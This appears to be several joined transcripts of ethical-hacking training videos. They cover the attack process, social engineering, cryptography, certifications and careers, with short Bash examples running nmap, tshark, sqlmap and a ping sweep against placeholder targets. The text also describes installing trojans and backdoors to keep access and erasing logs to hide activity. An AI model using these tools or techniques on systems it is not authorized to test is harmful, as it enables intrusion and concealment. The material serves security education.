So what would an ethical hacker do at this point? They would test the strength of the passwords to see whether brute force or dictionary attacks are possible, and whether any of these passwords can be cracked. They would ensure that all the employees are following the policies and that all the passwords are as secure as the policies want them to be. If there are any gaps in the policies, or in the implementation of the policies, it is the ethical hacker's responsibility to identify those gaps and warn the organization about them. Similarly, they would also try to protect any personal information, and any data owned by the organization that is critical for its functioning, from falling into a hacker's hands. Now, what are the skills required of an ethical hacker? First and foremost, they should have good knowledge of operating systems such as Windows, Linux, Unix and Mac. When we say knowledge about operating systems, it's not only about how to use them, but how to troubleshoot them, how they work, how they need to be configured, and how they can be secured. For example, securing an operating system is not only about installing a firewall and an antivirus; you need to configure permissions on the operating system for what users are and are not allowed to do, for example limiting the installation of applications. How are we going to do that? We need to go into the security center of Windows and configure security parameters there for which software is acceptable and which is not; the same goes for Linux and Mac operating systems. So we need to know how to secure these operating systems. Similarly, all of these have desktop versions and server versions; as an ethical hacker we need to know both, how to configure them, and how to provide services on these servers within the organization so that they can be consumed in a secure manner by all the employees. At the same time, they should also be knowledgeable about programming or scripting languages such as PHP, Python, Ruby and HTML, because web servers come into the picture. Again, they don't need to be great developers who can create huge applications, but they should be able to develop scripts, understand and analyze scripts, and figure out what the output of those scripts should be to achieve the hacking goals they have set out for. An ethical hacker should also have a very good understanding of networking. No matter whether you're in application security, network security or host-based security, since a computer will always be connected to a network, either a local area network (LAN) or the internet, we should know how networking works. We should know the seven layers of the OSI model and which protocols work on those layers; we should know the TCP/IP model and how the OSI model maps onto it; and we should understand how TCP and UDP work, how each and every protocol is crafted, and how it is supposed to behave, so that we can analyze and understand any network-based attacks. We should be very good with security measures: we should know where vulnerabilities are likely to lie and what the latest exploits available in the wild are, and we should be able to identify them. We should know the techniques and tools for dealing with security, for analyzing security, and then for implementing security to enhance it as
well. Along with that, it is important that a security analyst or ethical hacker is aware of the local security laws and standards. Why is that? Because an organization cannot do any illegal activity: whatever responses they have, whatever security mechanisms and controls they implement, need to adhere to the local law of the land; they should be legal in nature and should not cause undue harm to any of the employees or any of the third-party clients they are dealing with. So ethical hackers should be aware of what the security laws are before they implement security controls, or even before they start testing those controls. And all of this should be backed up by a globally valid certification, related to networking, security, ethical hacking, the law of the land, anything and everything, maybe even programming; it's good to have a certification in PHP, Perl, Python, Ruby and so on. Why? Because most organizations, when they hire ethical hackers, look for these certifications, especially globally valid ones, so that they can be assured the person they are hiring has the required skill set. So let's talk about a few of the tools that an ethical hacker would utilize in their testing scenarios. To be honest, there are hundreds of tools out there; what you see on the screen are just a few examples. Nessus is a vulnerability scanner. What is a vulnerability scanner? It is an automated tool designed to identify vulnerabilities within hosts, operating systems and networks. These scanners come with ready-made databases of all the vulnerabilities that have already been identified, and they scan the network against that database to find any possible flaws or vulnerabilities that currently exist on the host, the operating system or the network. Similarly, there are application scanners, like Acunetix or Arachni, that help you scan applications and identify flaws within them as well. Now, all of these are automated tools; the essence of the ethical hacker is that when these tools churn out their reports, the ethical hacker can understand those reports, analyze them, identify the flaws, and then craft their own exploits, or use existing exploits in a particular manner, to gain access or bypass the security control mechanisms already in place. How can they do that? With a tool called Metasploit. You see that big M there on the right-hand side: that M logo is for Metasploit, which is a penetration testing tool. What is a penetration testing tool? It is the tool that allows an ethical hacker to craft or choose exploits for the vulnerabilities that have been identified by Nessus. Since we are interacting with computers, we will always be interacting using tools, right? So the first tool, Nessus, identifies the flaws and the possible list of vulnerabilities; we then do a penetration test using Metasploit to validate those flaws, to verify that they actually exist, and to figure out their complexity; and that's where Metasploit helps us. Wireshark would be used in the background while we are doing both of these activities with Nessus or Metasploit, to keep track of what packets are being sent and received on the network, which helps us analyze those packets. So whenever I run a Nessus scan, I would run Wireshark in the background.
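As a rough Bash illustration of that scan-while-capturing workflow, here is a sketch; it assumes tshark (Wireshark's command-line capture tool) and nmap are installed, and eth0 and scanme.nmap.org stand in for your real interface and an authorized target.

```bash
#!/bin/bash
# capture_scan.sh - sketch: capture packets in the background while a scan runs.
# Assumes tshark (Wireshark's CLI) and nmap are installed; the interface and
# target are placeholders - only scan hosts you are authorized to test.

IFACE="eth0"
TARGET="scanme.nmap.org"   # nmap's official practice host

# start the packet capture in the background, writing to a pcap file
tshark -i "$IFACE" -w scan_capture.pcap &
TSHARK_PID=$!

# run the scan while the capture is recording (service/version detection)
nmap -sV "$TARGET" -oN nmap_results.txt

# stop the capture; scan_capture.pcap can now be opened in Wireshark
kill "$TSHARK_PID"
echo "scan saved to nmap_results.txt, packets to scan_capture.pcap"
```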
Wireshark will capture the data packets, and I can go through those data packets and analyze them to identify what Nessus is actually trying to do. Similarly, when I try to attack a machine using an exploit in Metasploit, I will keep Wireshark running in the background to capture the data packets that have been sent and the responses received from the victim, so that I can also go through those packets, analyze the responses, and analyze the attack: whether it was successful, and to what extent. It also gives me validation, a proof of the activity that has happened. Nmap is another automated tool, one that allows me to scan for open ports and protocols. Why would I use Nmap? Because ports and protocols become an entry point for a hacker to gain access to devices. For example, when we connect to a web server, we connect through a web browser, but we automatically connect to port 80 using HTTP, or to port 443 using HTTPS. So if I'm connecting to a web server using HTTPS, it is safe to assume that port 443 on the web server is open to accept those connections. Similarly, there may be other services left open on the web server because nobody thought about configuring it, or because it was misconfigured and unwanted services were left running. Nmap allows me to scan those ports and services and understand what services are being offered on that server; then I can start analyzing that server, identify the flaws within those services, and try to attack them. If the application I'm analyzing is connected to a database and I want to do a SQL injection attack, or if Nessus tells me that a SQL injection attack may be possible on that particular application, I can use an automated tool called sqlmap that will automatically craft all the queries required for a SQL injection attack and help me carry out that attack. So here I do not have to manually create my own queries; sqlmap automatically creates them for me. What I would do is use Nessus to identify that particular flaw; if Nessus reports it, I would then take sqlmap, configure it to attack that particular web server, and when I fire off the tool it will automatically start directing SQL injection queries at the database to see whether the databases are vulnerable, and if yes, what data can be retrieved from them. So all of these tools, in a nutshell, help me hack networks, applications, operating systems and host devices, and this is what the ethical hacker does: they use these kinds of toolsets, they identify what attacks they need to perform, they identify the right tool for each particular attack, they write or craft their exploits, and then they start attacking, analyze the response, and give a report to the management, providing feedback about how the attack was crafted, what the response to it was, and whether it was successful. If successful, they would also give recommendations on what to do to prevent these attacks from happening in the future.
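To give a feel for what "firing off the tool" looks like in practice, here is a hedged sketch of a typical sqlmap invocation; the URL and database name are placeholders, and the flags shown are common options rather than a prescribed recipe.

```bash
#!/bin/bash
# sqlmap_sketch.sh - illustrative sqlmap run against a parameterized URL.
# The URL and database name are placeholders; run this only against
# applications you are authorized to test.

TARGET_URL="http://testsite.example/item.php?id=1"

# --batch answers sqlmap's prompts with defaults (non-interactive)
# --dbs asks sqlmap to enumerate database names if injection is found
sqlmap -u "$TARGET_URL" --batch --dbs

# if a database is found, a follow-up run can list its tables, e.g.:
# sqlmap -u "$TARGET_URL" --batch -D shopdb --tables
```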
So when we are doing these attacks, or when we want to launch them, what is the process we would follow? There are six steps that we would take as an ethical hacker; if you're just a hacker, you probably wouldn't do the sixth step, which is the reporting step. The first step is the reconnaissance phase, the information gathering phase, which is very important from an ethical hacker's, or a hacker's, perspective, because if I want to attack someone or something digital, I need to know what I'm attacking. I need to know the IP address and MAC address of the device; I need to know the operating system, the build or version of that operating system, the applications on top, and the versions of those applications, so I know what I'm attacking. For example, if I want to attack a server, assume it's a Windows-based server, and use a particular tool to attack it, but it actually turns out to be a Linux-based server, my attacks are going to be unsuccessful. So I need to focus my attack based on what is there at the other end, and in the information gathering phase I want to identify all of that information. Once I have it, I'm going to scan those servers using tools like Nmap, which we just talked about, and try to see the open ports, open services and protocols running on that server that could give me possible entry points into the network, the device or the operating system. At the same time, along with the Nmap scanning, I would run a vulnerability scanner, the Nessus vulnerability scanner we talked about, or Acunetix for applications, and try to identify vulnerabilities in those applications, operating systems or networks. Once I have identified those vulnerabilities in the scanning phase, I move on to the gaining access phase, where I craft my exploits, or choose existing ones, and start attacking the victim. At this point, if my attack is successful, I will probably have gained access, either by cracking passwords, escalating privileges, or exploiting a vulnerability found during the scanning phase. Once I have gained my access, I want to maintain it. Why? Because the vulnerability may not be there for long: maybe somebody updates the operating system and the flaw no longer exists, or somebody changes the password I cracked, and I no longer have access. So what do I do to maintain access? I install trojans or backdoor entries on those systems, through which I can secretly, in a covert manner, access those devices at my own will and at my own time, as long as they are available over the network. So that's how I maintain my access: I have hacked them, and now I install software which gives me a backdoor entry to that device no matter what. Once I have done this, I want to clear my tracks. Whatever activity I have been doing, for example installing a trojan (a trojan is also a piece of software that creates directories and files once installed on the victim's machine), I want to hide; if I have accessed data stores, if I have modified data, I want to hide that activity, because if the victim comes to know that something has happened, they would start increasing their security parameters, they might start scanning their devices, they may take them offline, and thus my hack would no longer be effective. The reason I'm clearing my tracks is so that the victim doesn't find out that they have been hacked or compromised, or, even if they do find out, so that they cannot trace the compromise back to me. So I would be deleting references to any of the IP addresses or MAC addresses that I may have used to attack that particular device, and this
is where I will be able to identify where those logs were created and where those traces are. Once I remove those traces, the victim will be none the wiser about whether they have been compromised or who compromised their system. And if I am successful at all of these stages, or to whatever extent I have succeeded in any of them, I would then create a report and present it to the management, covering the activities we were able to do and what we achieved from them. For example: we identified 10 different flaws; there were 20 different attacks that we wanted to run; which attacks did we run, what was the outcome of each, and what was the intended or expected output? I'll create a report which gives a detailed analysis of all the steps taken, along with screenshots and evidence of what activity was conducted, what the output was and what the expected output was, and I would submit that report to the management, giving them an idea of what vulnerabilities and flaws exist in their environment or devices that need to be mitigated, so that security can be enhanced. So these are the six steps the ethical hacking process would take. Just going through this again: reconnaissance is where you're going to use hacking tools like Nmap and ping to obtain information about targets (there are hundreds of tools out there, depending on what information you want); in scanning, tools like Nmap are again utilized to identify open ports, protocols and services; in gaining access, you're going to exploit a vulnerability using the Metasploit tool we talked about in the previous slides; in maintaining access, you're going to install backdoors (you can use Metasploit, and at the same time you can craft your own scripts to create a trojan and install it on the victim's machine); once you have achieved that, clearing tracks is where you clear all evidence of your activity, so that you do not get caught and the victim doesn't even realize they have been hacked; and once you have done all of this, we create reports that are submitted to the management to help them understand the current security evaluation of their organization.
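Since the recap names ping and Nmap as reconnaissance tools, here is a small Bash sketch of the kind of ping sweep that the reconnaissance step describes; the 192.168.1.0/24 range is an assumed lab network, not a prescription.

```bash
#!/bin/bash
# ping_sweep.sh - sketch of a reconnaissance ping sweep over a lab subnet.
# The 192.168.1.x range is an assumption; substitute a network you own.

SUBNET="192.168.1"

for host in $(seq 1 254); do
    # -c 1: send one probe, -W 1: wait at most 1 second for a reply (Linux ping)
    if ping -c 1 -W 1 "$SUBNET.$host" > /dev/null 2>&1; then
        echo "$SUBNET.$host is up"
    fi
done

# nmap does the same job in one line (host discovery only, no port scan):
# nmap -sn 192.168.1.0/24
```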
So now let's see how we can hack using social engineering. What is social engineering? Social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed. This is where your social skills and people skills come into the picture: if you're able to communicate effectively with another person, they will probably give up more information than they intended to. Let's look at examples. If you see the phishing activity on the screen: what is phishing? We receive a lot of spam emails on a regular basis. We have all received those emails where we have won a lottery of a few million dollars, without ever realizing that we never bought a ticket in the first place. We have all had those Nigerian frauds, where a prince died in some country and you, out of 7 billion people on the planet, have been chosen as the one through whose account they want to transfer a few hundred million, offering you 50% of that money as a thank you. And there are some very basic attacks where you go to a website and there's a banner flashing at you saying, "Congratulations, you're the 1 millionth visitor to this website, click here to claim your prize." All of these are social engineering attacks: phishing attacks, fake websites, fake communications sent out to users to prey on their gullibility. Most humans have that dream of striking it rich, winning a huge lottery once and for all and living lavishly ever after; but sadly, in the real world, that doesn't happen very often, and if you're receiving those emails, it is very important that you first research the validity of those communications before you act upon them. So why are humans susceptible to social engineering? Because humans have emotions; machines do not. Try pleading with a machine to give you access to an account whose password you have forgotten: the machine wouldn't even know what you're doing. Try pleading with a human, appealing to sympathy or empathy, and you could craft a social engineering attack where you plead with them, saying, "If I do not get access to this account immediately, I might lose my job, and that would put my family into problems." Somebody would feel empathy or sympathy towards you and help you reset that password, giving you access to that account. It all depends on how good the attack is and how convincing you are. So what is a familiarity exploit? Attackers interact with victims to gain information which will benefit the attack, for example to crack credentials such as passwords. If we want to reset our passwords, what mechanism do we have? We have security questions that we set up; those questions are nothing but personal information that we would know, but through a social engineering attack it would easily be possible to gather the information you have set for your security questions. The security questions can be as simple as the first school that you attended; you probably have that listed on your LinkedIn profile, where a person can just go, look at your academic qualifications, and identify the school you were in. Similarly, it might be a question like "What was your mother's maiden name?" That's a very effective attack: if a person can interact with you, say they're pretending to run a survey and approach you for feedback on a product you have been using, and they ask you these questions, you wouldn't think twice before giving the answers. As long as a request sounds legitimate and we are able to justify it, we do answer such queries; so it's on us to verify the authenticity of the request before we answer it. Phishing, as discussed, would be fraudulent emails which appear to come from a trusted source, so email spoofing comes to mind, along with fake websites and so on. Then there is exploiting human curiosity; curiosity killed the cat, right? There are many physical attacks where hackers simply leave pen drives lying around in a parking lot. This is an open, generic attack: whoever falls victim, falls victim. If I scatter a few USB drives in the parking lot, obviously with trojans implanted on them, some people who are curious, or who are looking for a freebie, might pick up those pen drives and plug them into their computers to see what data is on them; and once they do, the virus or trojan installs itself and causes harm to their machine. Then there is exploiting human greed: we just talked about the Nigerian frauds and the lotteries, those kinds of attacks, the fake money-making
gimmicks. Basically, this is where you prey upon a person's greed kicking in, so that they click on those links in order to get the money that has been promised to them in that email. Now, one of the safest mechanisms to keep data private and to keep yourself secure is encryption. Encryption can be achieved through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user; only the person with the key to unscramble that data can unscramble it and make sense of it. So we make the data unreadable using a particular key or algorithm, and then we send the key to the end user; the end user, using the same key, then decrypts the data. If anybody intercepts the data while it is being sent over the network, since it is encrypted, they will not be able to read it. An encryption algorithm would work something like this: the word "computer", once made unreadable, would look like "eqorwvgt". To an end user it wouldn't make any sense, but the person who has the key to unscramble it can convert it back to "computer" and understand the meaning of that word. This is just a substitution cipher being shown on the screen. So what is the key? The key is a shift along the alphabet, in this case by two places: "c" shifted becomes "e", "o" becomes "q", "m" becomes "o", and so on; the key used to scramble the data is simply how far along the alphabet you move from the character you are at. The encrypted message is also known as the ciphertext. Decryption is just the other way around: knowing the key, you can figure out what that "e" corresponds to by going back the same number of characters in the alphabet. Many times, though, an ethical hacker must decrypt a message without knowing the secret key. Let's say a ransomware has affected your organization, or has affected a device, and you want to decrypt that data; as an ethical hacker you wouldn't be paying a ransom to the hacker, would you? So it is now your prerogative to work out how you're going to crack the encryption mechanism, how to crack the cipher, to decrypt that message and see what's within it. Decryption without the use of the secret key is known as cryptanalysis: reversing an algorithm to recover the message without using the key. Cryptanalysis can be done in various ways: the first is a brute force attack, the second is a dictionary attack, and the third is a rainbow table attack. In the brute force attack you try every possible permutation and combination of the key to figure out what the key was; it is 100% successful, but may take a lot of time. In the dictionary attack you have created a word list whose entries amount to candidate keys, and you try to match all the words listed in that text file or word list to see whether any of them will decrypt the data. And in the rainbow table attack, the ciphertext you have in hand is compared with other, precomputed ciphertexts: you find similarities and then you work, or reverse engineer, your way back accordingly.
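To tie the substitution cipher and the brute force idea together in the document's own language, here is a Bash sketch using tr: it encodes with a fixed shift, then brute-forces the ciphertext by trying all 25 possible shifts, a keyspace so small that brute force is instant (the shift of 2 mirrors the "computer" to "eqorwvgt" example above).

```bash
#!/bin/bash
# caesar.sh - sketch: alphabet-shift cipher with tr, then brute force all 25 keys.

ALPHA="abcdefghijklmnopqrstuvwxyz"

shift_text() {           # usage: shift_text <n> <text>
    local n=$1 text=$2
    # build the shifted alphabet, e.g. n=2 -> cdefghijklmnopqrstuvwxyzab
    local shifted="${ALPHA:n}${ALPHA:0:n}"
    echo "$text" | tr "$ALPHA" "$shifted"
}

cipher=$(shift_text 2 "computer")
echo "ciphertext: $cipher"        # prints: eqorwvgt

# brute force: try every possible key; a human (or a dictionary check)
# spots the one readable candidate among the 25 lines
for n in $(seq 1 25); do
    back=$(( (26 - n) % 26 ))     # undoing shift n means shifting 26-n forward
    echo "key $n: $(shift_text "$back" "$cipher")"
done
```

In the output, the line for key 2 reads "computer"; every other key yields gibberish, which is exactly why such a tiny keyspace offers no real protection.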
So let's have a quick demo on cryptography before we end this session. To begin, we are on a website called spammimic.com, which helps us scramble a message into a format completely unrelated to the topic at hand. So I say I want to encode a message: turn a short message into spam. What this does is, when you want to send a secret message, you type it in, a short one, and it converts it into a spam mail that you send across; whoever reads that spam mail would never get an idea of the message embedded within it. So I type in a message here, "hi this is a secret message the password is asd@1234", and I want to send this to one of my colleagues, but in a covert way, so that others are not aware of it. When I press encode, the algorithm converts this message into a spam mail. My message gets converted, and if you read the result, "Dear e-commerce professional, this letter was specially selected to be sent to you...", it doesn't make sense, and there is no reference anywhere to the actual message I typed. So I copy this entire message and send it, let's say via email, to the recipient. Now, the recipient needs to know that I encoded it using spammimic; the algorithm needs to remain the same. Once they know it is spammimic, what they can do, and what I'm going to do in this instance, is open up a new browser, go to the same website, and this time click on decode. When I click decode, I paste the message that I just copied, there we are, into the other browser, and when I decode it you will see it converts back to the original message. The key sits with spammimic and is embedded within the message, so whenever we paste the message into the decode function it knows what the key was, and it can decrypt the message and give me the actual message embedded within it. There we are, the entire message: what we created in the Google Chrome browser, we decoded in the Firefox browser. Similarly, if I want to protect these kinds of messages, there is the aspencrypt.com website where, let's say, we use text encryption. I want to encrypt the same message, "this is a secret message the password is asd@1234", and then I give it a password to protect it, let's say the word "password", and I choose the cipher used to scramble it, say AES, which is the strongest cipher right now, and I click encrypt. This is what the encryption looks like. If I don't have the password and I try to decrypt it, you will see that an error occurs; but if I type in the password and then decrypt, it converts the scrambled text back and gives me the original message: this is a secret message, the password is asd@1234. So if I want to keep my data secure from hackers, I want to scramble it in such a way that they will not be able to crack it, or at least it will be very difficult for them to crack, and this is one of the first mechanisms that would be recommended by any ethical hacker.
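The same password-protected AES idea can be reproduced from a Linux terminal with openssl, which suits this document's Bash focus. A minimal sketch, assuming the openssl CLI is installed; the message and throwaway password mirror the demo above.

```bash
#!/bin/bash
# aes_demo.sh - sketch: password-based AES encryption/decryption with openssl.
# Mirrors the website demo: same message, password "password" (demo only -
# never use a password like this for real data).

MSG="this is a secret message the password is asd@1234"

# encrypt: AES-256-CBC, key derived from the password with PBKDF2,
# base64-encoded so the result is printable
echo "$MSG" | openssl enc -aes-256-cbc -pbkdf2 -salt -base64 \
    -pass pass:password -out secret.enc

cat secret.enc          # scrambled, unreadable without the password

# decrypting with the right password recovers the message;
# a wrong password makes openssl report "bad decrypt"
openssl enc -d -aes-256-cbc -pbkdf2 -base64 \
    -pass pass:password -in secret.enc
```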
And before we begin: if you are someone who is interested in building a career in cyber security, or in becoming an ethical hacker, by graduating from the best universities, or a professional looking to switch careers into cyber security or ethical hacking by learning from the experts, then try giving a shot to Simplilearn's Postgraduate Program in Cyber Security, with modules from the MIT Schwarzman College of Computing. The course link is mentioned in the description box below; it will navigate you to the course page, where you can find a complete overview of the program being offered.

Hello everyone, and welcome to this video on the hacker's roadmap on the Simplilearn YouTube channel. As vast as the field of cyber security is, there's often an overflow of information about it. At the same time, for people who wish to know more about how to venture into the cyber security or ethical hacking space, it is very important to know what the career progression is, what skills are needed, and how a person with no, or bare-minimum, knowledge can take their first step in this amazing career. Well, this video is for all those individuals who wish to pursue a career in the field of cyber security and ethical hacking. Whether you are an entry-level professional, a college graduate, or an experienced professional looking to understand how a career in the field of cyber security progresses, and what additional skills and responsibilities you would need as you grow in the field, you are at the right place. So let's get started with our topic, the hacker's roadmap, beginning with what ethical hacking is and how it differs from hacking. In the world of cyber security, hacking can be broadly categorized into two types: ethical hacking and unethical hacking. Ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited, and these experts, known as white hat hackers, work with a focus on security rather than theft. On the other hand, we have unethical hacking, which refers to unauthorized access to digital devices or networks with malicious intent, performed by black hat hackers. Additionally, there are grey hat hackers, who possess knowledge in both offensive and defensive computer use, sometimes working as security consultants during the day and engaging in black hat activities at night. It is important to understand these distinctions to protect against cyber threats effectively. Now we'll see the objectives, or roles, of an ethical hacker. Ethical hackers, also known as white hat hackers,
use their skills and expertise to identify vulnerabilities in systems and networks before malicious hackers can exploit them. Their primary objective is to simulate real-world attacks and help organizations strengthen their security measures. The role of an ethical hacker involves several key phases: they are responsible for reconnaissance, scanning, gaining and maintaining access, clearing their tracks, documenting their findings, and compiling detailed reports. Firstly, they conduct thorough reconnaissance, gathering information about the target system or organization; this includes understanding the organization's structure, network infrastructure and potential weak points. Through scanning, they identify the easiest and quickest methods to gain access to the network and gather further information. Once access is gained, ethical hackers maintain it, allowing them to exercise their privileges and control the connected systems; this step helps them identify any potential security flaws and weaknesses within the network. They also work to clear their tracks, covering their footsteps to evade detection and ensuring that security personnel cannot trace their activities. And throughout the entire process, ethical hackers document their findings, compile detailed reports on the vulnerabilities discovered, and provide recommendations to address and mitigate the identified security issues. Their ultimate goal is to help organizations strengthen their defenses, prevent data breaches, and protect sensitive information from falling into the wrong hands. Ethical hacking is a crucial aspect of cyber security, as it allows organizations to stay one step ahead of cyber threats; by leveraging the skills of ethical hackers, businesses can proactively identify and address vulnerabilities, ensuring the overall security and integrity of their digital infrastructure. So now we'll look at the skills needed to be an ethical hacker. The first skill is knowledge of computer networks; then programming languages; then knowledge of web applications, databases, ethical hacking tools, and common attack vectors and techniques; and then the certificates required of an ethical hacker. We will start with knowledge of computer networks. Understanding computer networks is fundamental for ethical hackers; this includes concepts such as IP addressing, network protocols (for example TCP/IP), routing, switching and firewalls. A strong grasp of how networks function will enable you to identify vulnerabilities and potential entry points. Next is programming languages. Proficiency in programming languages is essential for effective ethical hacking: languages like Python, Java and C++, and scripting languages such as Perl or Ruby, are widely used in this field. Programming skills enable you to write custom scripts and tools, automate tasks, and exploit vulnerabilities. Next we have web applications. In today's digital landscape, web applications are often the target of attacks; therefore a solid understanding of web application architecture, protocols (for example HTTP) and security mechanisms (for example SSL/TLS) is crucial. Knowledge of web languages like HTML, CSS and JavaScript, and frameworks like PHP or ASP.NET, is also beneficial. Then we have databases. Databases store and manage sensitive data, making them attractive targets for hackers. Familiarize yourself with database management systems (DBMS) such as MySQL, Oracle or Microsoft SQL Server, and learn about database security, including
access control, encryption and vulnerability assessment. Then we should focus on knowledge of ethical hacking tools. To perform ethical hacking tasks efficiently, you should be familiar with various hacking tools; these include network scanners (for example Nmap), vulnerability scanners (for example Nessus), password crackers (John the Ripper), packet sniffers (Wireshark) and exploitation frameworks (Metasploit). Mastering these tools will enhance your effectiveness as an ethical hacker. Then you should have knowledge of common attack vectors and techniques: understanding these is vital for an ethical hacker. This includes knowledge of different types of malware, social engineering, network attacks (such as DDoS) and web application vulnerabilities (for example cross-site scripting). Staying up to date with the latest threats and attack methodologies is crucial for effective defense. Next is certificates. Obtaining relevant certifications demonstrates your expertise and commitment to the field. Certificates like Certified Ethical Hacker (CEH), Offensive Security Certified Professional (OSCP) or CompTIA Security+ are highly regarded within the industry; they validate your skills and can boost your credibility when seeking ethical hacking opportunities. The CEH certification is a multiple-choice exam that evaluates your understanding of the penetration testing structure and the tools utilized within it. It gives job seekers in the information security field a head start by ensuring that the certificate holder understands the fundamentals, such as information gathering, attacking computers or servers, wireless attacks and social engineering. The objectives of the CEH are, first, to inform the public that credentialed individuals meet or exceed the minimum standards, and second, to establish and govern minimum standards for credentialing professional information security specialists in ethical hacking. Now for a quick exam overview: the exam name is EC-Council Certified Ethical Hacker; the exam duration is 240 minutes; there are 125 questions; it is a multiple-choice exam; the passing score you need is 70%; and to register for the exam you go through Pearson VUE or an ECC exam center. As for the eligibility criteria for the CEH, there are two ways to satisfy them. One: attend official CEH training; this can be in any format, for example instructor-led training, computer-based training or live online training, as long as the program is approved by EC-Council. Two: attempt the exam without official training; to be considered for the EC-Council certification exam without attending official training, you must have two or more years of documented information security experience, pay a non-refundable eligibility application fee of $100, and submit a completed CEH exam eligibility form, including verification from an employer; upon approval, EC-Council will email you a voucher number to register for the CEH exam. So this was all about the CEH exam, and now we will move on to the steps to become an ethical hacker. Ethical hacking is an exciting and rapidly growing field that requires a combination of technical skills, knowledge and a strong sense of ethics; by following these steps, you can begin your journey towards becoming an ethical hacker and contribute to enhancing cyber security. Step one: knowledge of computer systems and networks. Step two: proficiency in programming languages. Step three: networking and security concepts,
of which you should have a working knowledge. Step four: knowledge of web applications and databases. Step five: understanding of operating systems. Step six: familiarity with ethical hacking tools. Step seven: problem solving and analytical thinking. Step eight: knowledge of common attack vectors and techniques. Step nine: certifications. Now we will elaborate on all the steps one by one, starting with knowledge of computer systems and networks. To become an ethical hacker, it is crucial to have a deep understanding of computer systems and networks. This involves familiarizing yourself with the inner workings of computer systems, network protocols, operating systems, and how different components interact within a network environment; by gaining this knowledge, you will be better equipped to identify vulnerabilities and assess potential security risks. Next is proficiency in programming languages. Programming languages are an essential tool for ethical hackers: by gaining proficiency in languages such as Python, C++, Java, JavaScript, SQL, Perl and Ruby, you will be able to develop your own scripts, automate tasks, and create exploit code. These languages provide the foundation for writing secure and efficient code, as well as for manipulating and analyzing data. The next step is networking and security concepts. To effectively assess and secure networks, it is important to have a solid understanding of networking and security concepts; this includes familiarizing yourself with topics such as network protocols, network security principles, encryption techniques and firewall configurations. Understanding how data is transmitted, secured and protected in a network environment will enable you to identify potential vulnerabilities and implement appropriate security measures. Step four: knowledge of web applications and databases. In today's interconnected world, web applications and databases are common targets for hackers; therefore it is crucial to develop a strong understanding of web application architectures, web protocols and database systems. Pay special attention to common vulnerabilities specific to web applications, such as SQL injection, cross-site scripting (XSS) and cross-site request forgery (CSRF); by gaining expertise in these areas, you will be able to effectively assess the security of web applications and databases, and provide appropriate recommendations for securing them. The next step is understanding of operating systems. Operating systems form the backbone of computer systems and are often targeted by hackers, so it is important to gain a comprehensive understanding of different operating systems such as Windows, Linux or macOS. This includes understanding system configurations, file permissions, user management, and the security mechanisms specific to each operating system; this knowledge will enable you to identify vulnerabilities, apply patches, and secure operating systems effectively. Step six: familiarity with ethical hacking tools. Ethical hackers rely on a variety of tools to assess and secure systems and networks. Familiarize yourself with popular ethical hacking tools such as Metasploit, Wireshark, Nmap, Burp Suite, Kali Linux, Canvas, SQLNinja and others; these tools provide functionality for vulnerability scanning, network sniffing, exploit development and penetration testing. Understanding how to use these tools effectively will enhance your capabilities as an ethical hacker. Now we'll see step seven, which is problem solving and analytical thinking. Being an ethical hacker requires strong problem solving skills
and the ability to think analytically. You will often encounter complex systems and face intricate security challenges; developing your problem solving abilities and analytical thinking will help you approach these challenges systematically, identify vulnerabilities, and devise effective strategies to mitigate risk. It is essential to stay updated with the latest security trends and technologies to enhance your problem solving skills. Step eight is knowledge of common attack vectors and techniques. To defend against potential threats, you must familiarize yourself with common hacking techniques and attack vectors used by malicious hackers; this includes social engineering, phishing attacks, password cracking, network-based attacks and more. Understanding how these attacks work, and the methodologies used, will enable you to proactively identify and prevent potential security breaches. And now step nine, which is certifications. While certifications are not mandatory to start a career in ethical hacking, they can provide a structured learning path and validate your skills and knowledge. Consider pursuing certifications such as Certified Ethical Hacker (CEH), Offensive Security Certified Professional (OSCP), Certified Information Systems Security Professional (CISSP), Certified Penetration Testing Engineer (CPTE) and EC-Council Certified Security Analyst (ECSA); these certifications demonstrate your expertise and dedication to the field, enhancing your credibility as an ethical hacker. Now we'll see the job roles in the ethical hacking field. There are several job roles in ethical hacking, so here's an elaboration on each of the major ones. Starting with the ethical hacker: an ethical hacker is a skilled professional who legally attempts to penetrate computer systems and networks to identify vulnerabilities and weaknesses; they use their knowledge to strengthen the security infrastructure and protect against cyber threats. Next is the network security engineer: network security engineers specialize in securing and maintaining computer networks within an organization; they implement and manage security measures such as firewalls, intrusion detection systems and virtual private networks (VPNs) to protect sensitive data. Then we have the cyber security analyst: cyber security analysts monitor and analyze systems for potential security breaches or incidents; they investigate threats, develop security protocols, and implement measures to protect against attacks. Next is the penetration tester: penetration testers, also known as ethical hackers, simulate real-world attacks to identify vulnerabilities in computer systems, networks and applications; they conduct thorough assessments and provide recommendations for improving security. Next is the information security manager: information security managers are responsible for overseeing an organization's overall security strategy and ensuring the protection of sensitive data; they develop and implement security policies, manage security teams, and handle incident response. Next is the cyber security engineer: cyber security engineers design and implement security systems, including firewalls, encryption protocols and intrusion detection systems; they also conduct risk assessments and perform security audits to maintain a secure environment. And next is the security consultant: security consultants provide expert advice and guidance on security strategies and solutions; they assess vulnerabilities, develop security plans, and assist organizations in improving their overall security posture. In the United States, demand for these roles is very high. And this was all for this tutorial.

Did you know that in August this year, Google openly admitted that some of its Gmail accounts were hacked by an Iranian group? Fortunately, the event was isolated and was taken care of, but rarely are security breaches this easy to stop. With more and more data moving to the cloud, the prospects of hacks like these have grown exponentially in the past decade; consequently, organizations have now discovered the need to secure their digital infrastructure against various attack vectors, fueling the need for ethical hackers in the IT industry. Today's video is all about how you can learn the ins and outs of hacking and cyber security, irrespective of your learning background. So welcome to our video on how to become an ethical hacker, by Simplilearn. Before we get started, ensure you're subscribed to our channel so you always stay updated with the latest technologies and trends. Let's first clear the air on an ethical hacker's role. The term hacking has inherently negative connotations, but only until the duty of an ethical hacker is properly understood: ethical hackers are the good people in the hacking field, wearing the white hat. So what exactly is the responsibility of an ethical hacker? Instead of utilizing their extensive computer expertise for criminal purposes, ethical hackers find gaps in data and computer security for businesses and organizations worldwide, to defend them against hackers with less noble intentions. Ethical hacking is a subcategory of cyber security that involves lawfully breaking a system's security mechanisms in order to discover possible threats and data leaks on the network. Ethical hackers can work for a corporation as independent freelancers, as in-house security staff for its website or applications, or as simulated offensive cyber security professionals. All of these careers need knowledge of current attack methodologies and tools, albeit the
But how can you hone your ethical hacking skills? Let's take a look at a few steps one can take while starting a career in this field.

